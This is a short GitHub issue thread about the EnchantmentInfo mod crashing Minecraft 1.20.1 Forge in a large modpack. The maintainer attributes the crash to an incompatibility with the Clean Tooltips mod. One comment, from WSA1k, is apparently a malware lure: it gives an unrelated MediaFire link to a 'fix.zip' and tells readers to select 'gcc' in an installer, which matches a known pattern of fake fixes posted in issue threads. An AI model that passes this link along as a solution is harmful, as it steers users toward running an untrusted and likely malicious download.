### ISSUE TITLE
Instant Crash with Modpack- 1.20.1 Forge

### ISSUE THREAD

**Issue by YeraX7** [TeamDurt/EnchantmentInfo#2]
When I install the mod on my modpack, it won't let me start minecraft and crashes instantly.

Link to my modpack on Curseforge that can't initiate with the mod (Note that the EnchantmentInfo mod is not on the list): https://www.curseforge.com/minecraft/modpacks/biohazard-project-genesis-the-ultimate-apocalypse

Thank you!

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by HiWord9** [comment]
Looks like incompatibility with [Clean Tooltips](https://www.curseforge.com/minecraft/mc-mods/clean-tooltips), will try to add support for this mod
